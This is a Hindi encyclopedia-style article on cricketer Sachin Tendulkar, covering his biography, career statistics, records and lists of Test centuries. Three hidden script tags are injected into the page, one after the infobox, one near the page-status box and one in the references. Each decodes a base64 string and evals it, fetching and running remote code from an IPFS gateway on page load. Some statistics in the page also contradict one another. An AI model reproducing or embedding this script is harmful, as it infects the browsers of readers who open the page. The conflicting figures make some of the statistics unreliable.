सचिन तेंदुलकर

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
सचिन तेंदुलकर
Sachin-Tendulkar-2.jpg
व्यक्तिगत परिचय
पूरा नाम सचिन रमेश तेंदुलकर
अन्य नाम मास्टर ब्लास्टर, लिटिल मास्टर, तेंदल्या, लिटिल चैंपियन
जन्म 24 अप्रैल, 1973
जन्म भूमि मुंबई
ऊँचाई 5 फुट 5 इंच
पत्नी अंजलि
संतान पुत्र-अर्जुन, पुत्री-सारा
खेल परिचय
बल्लेबाज़ी शैली दाएँ हाथ
गेंदबाज़ी शैली दायें हाथ के लेग स्पिन
टीम भारत,एशिया XI,मुंबई,मुंबई इंडियंस,यॉर्कशायर
भूमिका बल्लेबाज
पहला टेस्ट 15 नवम्बर, 1989 बनाम पाकिस्तान, कराची
आख़िरी टेस्ट 3 अगस्त, 2010 बनाम श्रीलंका
पहला वनडे 18 दिसंबर, 1989 बनाम पाकिस्तान, गुजरांवाला
आख़िरी वनडे 24 फ़रवरी, 2010 बनाम दक्षिण अफ्रीका
कैरियर आँकड़े
प्रारूप टेस्ट क्रिकेट एकदिवसीय अन्तर्राष्ट्रीय टी-20 अन्तर्राष्ट्रीय
मुक़ाबले 169 453 1
बनाये गये रन 13,837 18,111[1] 10
बल्लेबाज़ी औसत 56.02 45.16 10.0
100/50 48/54 48/95 -
सर्वोच्च स्कोर 248* 200* -
फेंकी गई गेंदें 3,982 8,020 -
विकेट 44 154 -
गेंदबाज़ी औसत 52.22 44.40 -
पारी में 5 विकेट 0 2 -
मुक़ाबले में 10 विकेट 0 नहीं है -
सर्वोच्च गेंदबाज़ी 3/10 5/32 -
कैच/स्टम्पिंग 106 134 1
बाहरी कड़ियाँ CricketArchive
अद्यतन 18:40, 3 अप्रॅल 2011 (IST)

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

  • सचिन रमेश तेंदुलकर को भारतीय क्रिकेट में भगवान की तरह माना जाता है। 20वीं शताब्दी के अंतिम वर्षों में भारत के महानतम बल्लेबाज़ों में से एक हैं। सचिन तेंदुलकर का जन्म 24 अप्रैल, 1973 को मुम्बई में हुआ।
  • सचिन क्रिकेट के इतिहास में विश्व के सर्वश्रेष्ठ बल्लेबाजों में गिने जाते हैं। वे बल्लेबाज़ी में कई कीर्तिमान स्थापित कर चुके हैं।
  • सचिन तेंदुलकर ने टेस्ट व एकदिवसीय क्रिकेट, दोनों में सर्वाधिक शतक अर्जित किये हैं। वे टेस्ट क्रिकेट में सबसे ज़्यादा रन बनाने वाले बल्लेबाज़ है। इसके साथ टेस्ट क्रिकेट में 14000 से अधिक रन बनाने वाले वे विश्व के एकमात्र खिलाड़ी हैं। एकदिवसीय मैचों में भी उन्हें कुल सर्वाधिक रन बनाने का कीर्तिमान प्राप्त है।
  • सचिन राजीव गांधी खेल रत्न पुरस्कार से सम्मानित एकमात्र क्रिकेट खिलाड़ी हैं। वे सन 2008 में पद्म विभूषण से भी पुरस्कृत किये जा चुके है।
  • वे क्रिकेट जगत के सर्वाधिक प्रायोजित खिलाड़ी हैं और विश्वभर में उनके अनेक प्रशंसक हैं। उनके प्रशंसक उन्हें प्यार से लिटिल मास्टरमास्टर ब्लास्टर कह कर बुलाते हैं।
विश्व कप ट्रॉफी के साथ सचिन तेंदुलकर, हरभजन सिंह, सुरेश रैना और एस. श्रीसंत

जीवन परिचय

राजापुर के सारस्वत ब्राह्मण परिवार में जन्मे सचिन का नाम उनके पिता रमेश तेंदुलकर ने उनके चहेते संगीतकार सचिन देव बर्मन के नाम पर रखा था। उनके बड़े भाई अजीत तेंदुलकर ने उन्हें खेलने के लिये प्रोत्साहित किया था। सचिन के एक भाई नितिन तेंदुलकर और एक बहन सवितई तेंदुलकर भी हैं। 1995 में सचिन तेंदुलकर का विवाह अंजलि तेंदुलकर से हुआ, वो पेशे से डॉक्टर हैं। सचिन की दो संतान है - पुत्री सारा और पुत्र अर्जुन। क्रिकेट के अलावा वे अपने ही नाम के एक सफल रेस्टोरेंट के मालिक भी हैं।

आरंभिक जीवन

सचिन ने शारदाश्रम विद्यामंदिर में अपनी शिक्षा ग्रहण की। तेज़ गेंदबाज़ बनने के लिये उन्होंने एम.आर.एफ. पेस फाउंडेशन के अभ्यास कार्यक्रम में शिरकत की। पर वहाँ तेज़ गेंदबाज़ी के कोच डेनिस लिली ने उन्हें पूर्ण रूप से अपनी बल्लेबाज़ी पर ध्यान केंद्रित करने को कहा। रमाकांत आचरेकर के निर्देशन में अल्पायु में ही क्रिकेट खेलना शुरू करके तेंदुलकर ने 1988 में स्कूल के एक हॅरिस शील्ड मॅच में विनोद कांबली के साथ खेलते हुए 664 रन की भागीदारी बनाकर स्कूल क्रिकेट में विश्व कीर्तिमान स्थापित किया। इस धमाकेदार जोडी के अद्वितीय प्रदर्शन के कारण एक गेंदबाज तो रो ही दिया और विरोधी पक्ष ने मैच आगे खेलने से इंकार कर दिया। सचिन ने इस मैच में 320 रन और प्रतियोगिता में हज़ार से भी ज़्यादा रन बनाये। युवाकाल में तेंदुलकर घंटों अपने कोच के साथ अभ्यास करते थे। उनके कोच स्टम्प्स पर एक रुपये का सिक्का रख देते, और जो गेंदबाज़ सचिन को आउट करता, वह् सिक्का उसी को मिलता था। और यदि सचिन बिना आउट हुये पूरे समय बल्लेबाज़ी करने में सफल हो जाते, तो ये सिक्का उन्हें मिलता था। सचिन के अनुसार उस समय उनके द्वारा जीते गये 13 सिक्के आज भी उन्हें सबसे ज़्यादा प्रिय हैं।

अंतर्राष्ट्रीय क्रिकेट में पदार्पण

उन्होंने अपना पहला प्रथम श्रेणी क्रिकेट मैच मुंबई के लिये 14 वर्ष की उम्र मे खेला। सचिन ने अंतर्राष्ट्रीय टेस्ट क्रिकेट में पदार्पण 15 नवम्बर, 1989 को पाकिस्तान के ख़िलाफ़ कराची में किया तथा सचिन ने अपना पहला एकदिवसीय क्रिकेट मैच भी पाकिस्तान के ख़िलाफ़ 18 दिसम्बर 1989 को खेला। सचिन 27 वर्ष की आयु तक 59 शतक (टेस्ट मैचों में 28, और एकदिवसीय क्रिकेट में 31) बना चुके थे। 46 शतक बनाकर उन्होंने सुनील गावस्कर, डेस्मंड हेन्स और विवियन रिचडर्स जैसे क्रिकेट के पूर्व महारथियों के स्थापित कीर्तिमान तोड़ दिए। वह एकदिवसीय क्रिकेट में 10,000 रन बनाने वाले पहले खिलाड़ी हैं। वह दो बार भारतीय टीम के कप्तान बने। टेस्ट और एकदिवसीय क्रिकेट खेलने वाले सबसे कम उम्र के खिलाड़ी तेंदुलकर ने 16 वर्ष की उम्र में 1989 में पाकिस्तान के ख़िलाफ़ टेस्ट मैच में अपने क्रिकेट जीवन की शुरुआत की। अद्भुत बल्लेबाज़ी करते हुए 20वीं सदी के अंत तक लगभग 11 वर्षो के पेशेवर खेल जीवन में उन्होंने 54.84 रन का ख़ासा ऊँचा टेस्ट औसत बनाए रखा, जो ग्रेग चैपल, विवियन रिचडर्स, जावेद मियांदाद, ब्रायन लारा और सुनील गावस्कर जैसे धुरंधरों के रन औसत से कहीं अधिक है। पाँच फुट चार इंच लंबे तेंदुलकर अपने क़द की कमी को अपने पैरों के फुर्तीलेपन से पूरा करते हैं। क्रिकेट इतिहास के महानतम खिलाड़ियों में से एक सर डोनॉल्ड ब्रेडमैन ने तेंदुलकर की यह कहते प्रशंसा की कि पिछले 50 वर्षों में अंतर्राष्ट्रीय क्रिकेट खेलने वाले बेशुमार बल्लेबाज़ों में सिर्फ़ तेंदुलकर उनकी शैली के निकट पहुँच सके हैं।

सचिन
सचिन बल्लेबाज़ी करते हुए
Sachin Tendulkar
सचिन

सचिन तेंदुलकर के नाम कई बडे़ कीर्तिमान

  • सबसे ज़्यादा वन डे मैच खेलने का रिकार्ड (453 वन डे)
  • वन डे मुक़ाबले में सबसे ज़्यादा रन (18111 रन)
  • वन डे मुक़ाबले में सबसे ज़्यादा 48 शतक
  • वन डे क्रिकेट के इतिहास में दोहरा शतक लगाने वाले पहले क्रिकेटर
  • वन डे क्रिकेट मुक़ाबले में सबसे ज़्यादा मैन ऑफ द सीरीज
  • वन डे क्रिकेट मुक़ाबले में सबसे ज़्यादा मैन ऑफ द मैच
  • विश्व कप क्रिकेट मुक़ाबलों में सबसे ज़्यादा रन
  • विश्वकप में सबसे ज़्यादा शतक, अर्धशतक बनाने का रिकार्ड
  • 1996 और 2003 विश्वकप में सर्वाधिक रन बनाने वाले बल्लेबाज का रिकार्ड
  • टेस्ट क्रिकेट मे सबसे ज़्यादा शतक
  • टेस्ट क्रिकेट में सर्वाधिक रनों का कीर्तिमान
  • टेस्ट क्रिकेट 13000 रन बनने वाले विश्व के पहले बल्लेबाज
  • अंतरराष्ट्रीय मुक़ाबलो मे सबसे ज़्यादा 30000 रन बनाने का कीर्तिमान

सचिन के 50 टेस्ट शतकों का ब्यौरा

1. 14 अगस्त 1990- 114 रन (नाबाद)- इंग्लैंड के ख़िलाफ़- ओल्ड ट्रैफ़र्ड
2. 6 जनवरी 1992- 148 रन(नाबाद)- ऑस्ट्रेलिया के ख़िलाफ़- सिडनी
3. 3 फरवरी 1992- 114 रन- ऑस्ट्रेलिया के ख़िलाफ़- पर्थ
4. 28 नवंबर 1992- 111 रन- दक्षिण अफ़्रीका के ख़िलाफ़- जोहानेसबर्ग
5. 12 फरवरी 1993- 165 रन- इंग्लैंड के ख़िलाफ़- चेन्नई
6. 31 जुलाई 1993- 104 रन(नाबाद)- श्रीलंका के ख़िलाफ़- चेन्नई
7. 19 जनवरी 1994- 142 रन- श्रीलंका के ख़िलाफ़- लखनऊ
8. 2 दिसंबर 1994- 179 रन- वेस्टइंडीज़ के ख़िलाफ़- नागपुर
9. 8 जून 1996- 122 रन- इंग्लैंड के ख़िलाफ़- बर्मिंघम
10. 5 जुलाई 1996- 177 रन- इंग्लैंड के ख़िलाफ़- नॉटिंघम
11. 4 जनवरी 1997- 169 रन- दक्षिण अफ़्रीका के ख़िलाफ़- केपटाउन
12. 3 अगस्त 1997- 143 रन- श्रीलंका के ख़िलाफ़- कोलंबो
13. 11 अगस्त 1997- 139 रन- श्रीलंका के ख़िलाफ़- कोलंबो
14. 4 दिसंबर 1997- 148 रन- श्रीलंका के ख़िलाफ़- मुंबई
15. 9 मार्च 1998- 155 रन (नाबाद)- ऑस्ट्रेलिया के ख़िलाफ़- चेन्नई
16. 26 मार्च 1998- 177 रन- ऑस्ट्रेलिया के ख़िलाफ़- बंगलौर
17. 29 दिसंबर 1998- 113 रन- न्यूज़ीलैंड के ख़िलाफ़- वेलिंगटन
18. 31 जनवरी 1999- 136 रन- पाकिस्तान के ख़िलाफ़- चेन्नई
19. 28 फरवरी 1999- 124 रन(नाबाद)- श्रीलंका के ख़िलाफ़- कोलंबो
20. 13 अक्तूबर 1999- 126 रन(नाबाद)- न्यूज़ीलैंड के ख़िलाफ़- मोहाली
21. 30 अक्तूबर 1999- 217 रन- न्यूज़ीलैंड के ख़िलाफ़- अहमदाबाद
22. 28 दिसंबर 1999- 116 रन- ऑस्ट्रेलिया के ख़िलाफ़- मेलबोर्न
23. 21 नवंबर 2000- 122 रन- ज़िम्बाब्वे के ख़िलाफ़- नई दिल्ली
24. 26 नवंबर 2000- 201 रन(नाबाद)- ज़िम्बाब्वे के ख़िलाफ़- नागपुर
25. 20 मार्च 2001- 126 रन- ऑस्ट्रेलिया के ख़िलाफ़- चेन्नई
26. 3 नवंबर 2001- 155 रन- दक्षिण अफ़्रीका के ख़िलाफ़- ब्लूमफोंटिन
27. 13 दिसंबर 2001- 103 रन- इंग्लैंड के ख़िलाफ़- अहमदाबाद
28. 24 फरवरी 2002- 176 रन- ज़िम्बाब्वे के ख़िलाफ़- नागपुर
29. 20 अप्रैल 2002- 117 रन- वेस्टइंडीज़ के ख़िलाफ़- पोर्ट ऑफ़ स्पेन
30. 23 अगस्त 2002- 193 रन- इंग्लैंड के ख़िलाफ़- लीड्स
31. 3 नवंबर 2002- 176 रन- वेस्टइंडीज़ के ख़िलाफ़- कोलकाता
32. 4 जनवरी 2004- 241 रन (नाबाद)- ऑस्ट्रेलिया के ख़िलाफ़- सिडनी
33. 29 मार्च 2004- 194 रन (नाबाद)- पाकिस्तान के ख़िलाफ़- मुल्तान
34. 12 दिसंबर 2004- 248 रन (नाबाद)- बांग्लादेश के ख़िलाफ़- ढाका
35. 22 दिसंबर 2005- 109 रन- श्रीलंका के ख़िलाफ़- नई दिल्ली
36. 19 मई 2007- 101 रन- बांग्लादेश के ख़िलाफ़- चटगाँव
37. 26 मई 2007- 122 रन (नाबाद)- बांग्लादेश के ख़िलाफ़- मीरपुर
38. 4 जनवरी 2008- 154 रन (नाबाद)- ऑस्ट्रेलिया के ख़िलाफ़- सिडनी
39. 25 जनवरी 2008- 153 रन- ऑस्ट्रेलिया के ख़िलाफ़- एडिलेड
40. 6 नवंबर 2008- 109 रन- ऑस्ट्रेलिया के ख़िलाफ़- नागपुर
41. 15 दिसंबर 2008- 103 रन (नाबाद)- इंग्लैंड के ख़िलाफ़- चेन्नई
42. 20 मार्च 2009- 160 रन- न्यूज़ीलैंड के ख़िलाफ़- हैमिल्टन
43. 20 नवंबर 2009- 100 रन (नाबाद)- श्रीलंका के ख़िलाफ़- अहमदाबाद
44. 18 जनवरी 2010- 105 रन (नाबाद)- बांग्लादेश के ख़िलाफ़- चटगाँव
45. 25 जनवरी 2010- 143 रन- बांग्लादेश के ख़िलाफ़- मीरपुर
46. 9 फरवरी 2010- 100 रन- दक्षिण अफ़्रीका के ख़िलाफ़- नागपुर
47. 15 फरवरी 2010- 106 रन- दक्षिण अफ़्रीका के ख़िलाफ़- कोलकाता
48. 28 जुलाई 2010- 203 रन- श्रीलंका के ख़िलाफ़- कोलंबो
49. 11 अक्तूबर 2010- 214 रन- ऑस्ट्रेलिया के ख़िलाफ़- बंगलौर
50. 19 दिसंबर 2010- 111 रन (नाबाद)- दक्षिण अफ़्रीका के ख़िलाफ़- सेंचुरियन

सचिन का टेस्ट मैच में शतकों का ब्यौरा
टेस्ट मैच स्कोर विरुद्ध स्थान तारीख़ नतीजा
1 119 इंग्लैंड मैनचेस्टर 14 अगस्त 1990 ड्रॉ
2 148 ऑस्ट्रेलिया सिडनी 06 जनवरी, 1992 ड्रॉ
3 114 ऑस्ट्रेलिया पर्थ 03 फरवरी, 1992 हार
4 111 दक्षिण अफ़्रीका जोहानेसबर्ग 28 नवंबर, 1992 ड्रॉ
5 165 इंग्लैंड चेन्नई 12 फरवरी, 1993 जीत
6 104 श्रीलंका कोलंबो 31 जुलाई, 1993 जीत
7 142 श्रीलंका लखनऊ 19 जनवरी, 1994 जीत
8 179 वेस्टइंडीज़ नागपुर 02 दिसंबर, 1994 ड्रॉ
9 122 इंग्लैंड बर्मिंघम 08 जून, 1996 हार
10 177 इंग्लैंड नॉटिंघम 05 जुलाई, 1996 ड्रॉ
11 169 दक्षिण अफ़्रीका केपटाउन 04 जनवरी, 1997 हार
12 143 श्रीलंका कोलंबो 03 अगस्त, 1997 ड्रॉ
13 139 श्रीलंका कोलंबो 11 अगस्त, 1997 ड्रॉ
14 148 श्रीलंका मुंबई 04 दिसंबर, 1997 ड्रॉ
15 155 ऑस्ट्रेलिया चेन्नई 09 मार्च, 1998 जीत
16 177 ऑस्ट्रेलिया बंगलौर 26 मार्च, 1998 हार
17 113 न्यूज़ीलैंड वेलिंगटन 29 दिसंबर, 1998 हार
18 136 पाकिस्तान चेन्नई 31 जनवरी, 1999 हार
19 124 श्रीलंका कोलंबो 28 फरवरी, 1999 ड्रॉ
20 126 न्यूज़ीलैंड मोहाली 13 अक्तूबर, 1999 ड्रॉ
21 217 न्यूज़ीलैंड अहमदाबाद 30 अक्तूबर, 1999 ड्रॉ
22 116 ऑस्ट्रेलिया मेलबोर्न 28 दिसंबर, 1999 हार
23 122 ज़िम्बाब्वे नई दिल्ली 21 नवंबर, 2000 जीत
24 201 ज़िम्बाब्वे नागपुर 26 नवंबर, 2000 ड्रॉ
25 126 ऑस्ट्रेलिया चेन्नई 20 मार्च, 2001 जीत
26 155 दक्षिण अफ़्रीका ब्लूमफ़ोंटिन 03 नवंबर, 2001 हार
27 103 इंग्लैंड अहमदाबाद 13 दिसंबर, 2001 ड्रॉ
28 176 ज़िम्बाब्वे नागपुर 24 फरवरी, 2002 जीत
29 117 वेस्टइंडीज़ पोर्टऑफ़ स्पेन 20 अप्रैल, 2002 जीत
30 193 इंग्लैंड लीड्स 23 अगस्त, 2002 जीत
31 176 वेस्टइंडीज़ कोलकाता 03 नवंबर, 2002 ड्रॉ
32 241 ऑस्ट्रेलिया सिडनी 04 जनवरी, 2004 ड्रॉ
33 194 पाकिस्तान मुल्तान 29 मार्च, 2004 जीत
34 248 बांग्लादेश ढाका 12 दिसंबर, 2004 जीत
35 109 श्रीलंका दिल्ली 22 दिसंबर, 2005 जीत
36 101 बांग्लादेश चटगाँव 19 मई, 2007 ड्रॉ
37 122 बांग्लादेश मीरपुर 26 मई, 2007 जीत
38 154 ऑस्ट्रेलिया सिडनी 04 जनवरी, 2008 हार
39 153 ऑस्ट्रेलिया एडिलेड 25 जनवरी, 2008 ड्रॉ
40 109 ऑस्ट्रेलिया नागपुर 06 नवंबर, 2008 जीत
41 103 इंग्लैंड चेन्नई 15 दिसंबर, 2008 जीत
42 160 न्यूज़ीलैंड

हैमिल्टन

20 मार्च, 2009 जीत
43 100 श्रीलंका अहमदाबाद 20 नवंबर, 2009 ड्रॉ
44 105 बांग्लादेश चटगाँव 18 जनवरी, 2010 जीत
45 143 बांग्लादेश मीरपुर 25 जनवरी, 2010 जीत
46 100 दक्षिण अफ़्रीका नागपुर 09 फरवरी, 2010 हार
47 106 दक्षिण अफ़्रीका कोलकाता 15 फरवरी, 2010 जीत
48 203 श्रीलंका कोलंबो 28 जुलाई, 2010 ड्रॉ
49 214 ऑस्ट्रेलिया बंगलौर 11 अक्तूबर, 2010 जीत
50 111 दक्षिण अफ़्रीका सेंचुरियन 19 दिसंबर, 2010 हार
51 146 दक्षिण अफ़्रीका केपटाउन 04 जनवरी, 2011 ड्रॉ

वीथिका


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

  1. Sachin Tendulkar (अंग्रेज़ी) (एच.टी.एम.एल) espncricinfo.com। अभिगमन तिथि: 3 अप्रॅल, 2011।<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

संबंधित लेख